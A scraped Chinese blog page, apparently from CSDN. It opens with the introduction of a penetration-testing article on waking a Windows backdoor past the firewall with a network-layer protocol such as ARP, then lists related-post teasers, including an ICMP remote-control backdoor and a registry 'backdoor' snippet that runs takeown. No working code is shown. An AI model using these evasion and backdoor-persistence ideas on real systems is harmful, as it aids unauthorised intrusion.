背景 在渗透测试过程中,我们常常会遇到这种情况,目标上的木马被杀了,留了正向后门,却因为windows防火墙的原因,无法唤醒。所以我们就需要一种方法,来bypass防火墙唤醒我们的后门或者作为后门。 技术细节 选择协议 首先我们要远程唤醒,必然是要选择一种网络协议的。为了满足我们的需求,传输层及以传输层以上的协议是必然不能选择的。物理层和数据链路层是我们无法控制的。所以我们只能选择网络层的协议。网络层的协议(IP/ICMP/ARP/RARP/BGP)有以上协议供我们选择。 ARP协议(局域网中的工作情况)
关于decode方法返回类型
不会哭的人的博客
05-17 5398
decode()函数的返回类型由第一个值的返回类型决定
jmeter 对接口的响应值进行base64解码
热门推荐
有一种人仅仅是认识就很好了的博客
07-19 1万+
此次我的例子包含了A接口的值做B接口的参数。 commons-codec-1.11.jar包下载地址:http://commons.apache.org/proper/commons-codec/download_codec.cgi 在做base64解密之前需要去下载 commons-codec-1.11.jar ,下载完成后,把jar放在C:\apache-jmeter-4.0\lib\e...
从C++实现Ping开始说起
weixin_30724853的博客
05-31 337
在C++中实现ping功能,并不难。但真正了解ping是需要花费一番功夫的。 Ping功能是在ICMP基础上实现的。IP协议并不是一个可靠的协议,它不保证数据被送达,那么,保证数据送达的工作应该由其他的模块来完成。其中一个重要的模块就是ICMP(网络控制报文)协议。ICMP主要是用来实现IP系统间传递差错和管理报文,是任何IP实现必须和要求的组成部分。它是TCP/IP协议族的一个子协议,属于网...
Python3实现ICMP远控后门(上)_补充篇
七夜的博客
05-11 643
ICMP后门(上)补充篇   前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不是很了解,实现的ping功能仅实现了发送,接收没有实现,一个完整ping如何实现等等。本来对于ICMP后门写三篇文章的,但是对大家的疑惑临时开辟了一个补充篇,对ICMP协议校验方式,以...
SDO处理过程(一)
tangtang_yue的博客
06-23 3041
/* the last SDO is still in work */           return MBXERR_SERVICEINWORK;       }   #endif   /*根据SDO的不同的服务类型,选择想对应的SDO服务*/       switch (command)       {       case SDOSERVICE_INITIATEDOWNLOAD
windows后门
f1gure的博客
07-04 956
1、打开记事本,输入下列文本:Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\*\shell\runas]@="获取权限""NoWorkingDirectory"=""[HKEY_CLASSES_ROOT\*\shell\runas\command]@="cmd.exe /c takeown /f \"%1\" &amp;&amp; i...
使用原始套接字编程实现简单的ping程序
zhangxiaofangtongxue的专栏
07-20 7407
程序实现步骤: 1、初始化Windows Sockets网络环境   WSADATA    wsa; WSAStartup(MAKEWORD(2,2),&wsa); 2、构造目的端Socket地址 3、创建原始套接字 4、定义IP和ICMP头部数据结构 5、发送报文 6、接收报文 其中ICMP回显请求与回显应答报文结构如下图: typedef struct IcmpHead
分析TCP/IP协议栈代码之IP & ICMP(STM32平台)
fovwin的专栏
04-22 5662
ARP部分 IP&ICMP部分 UDP部分 TCP部分 1. IP介绍 IP是TCP/IP协议族中最为核心的协议。大家,如TCP、UDP、ICMP及IGMP数据,都是在IP数据报格式基础上再封装一层再来传输的(见图1 - 4)。 不可靠(unreliable)的意思是它不能保证 IP数据报能成功地到达目的地。 IP仅提供最好的传输服务。如果发生某种错误时,如某个
bbscloud微信小程序原码
12-31
bbscloud微信小程序原码是一款基于微信小程序开发的社交平台应用原始代码,主要用于用户之间互相交流、分享信息、发布动态等功能。该原码包含了小程序的各种页面设计、交互逻辑、后端接口调用等相关代码,并且提供了完整的文件结构和代码注释,方便开发者进行定制化的功能修改和优化。 小程序的主要页面包括了登录、注册、个人中心、社区主页、帖子详情、消息通知等,用户可以通过这些页面进行注册登录后在社区中进行发帖、评论、点赞等操作,并且可以查看自己的动态和收到的消息通知。 bbscloud微信小程序原码采用了微信官方推荐的开发框架,结合了原生小程序语法和组件,使用了微信提供的云开发能力,实现了数据存储、云函数调用、用户鉴权等功能。同时,原码中还包含了对小程序界面的样式设计、图片资源的管理、数据接口的封装等方面的代码。 开发者可以根据自己的需求,对bbscloud微信小程序原码进行二次开发,添加更多个性化的功能、改进用户体验,或者进行定制化的界面设计。通过对原码的修改和优化,可以让小程序更好地符合特定社交场景的需求,提升用户的使用体验,满足不同用户群体的需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值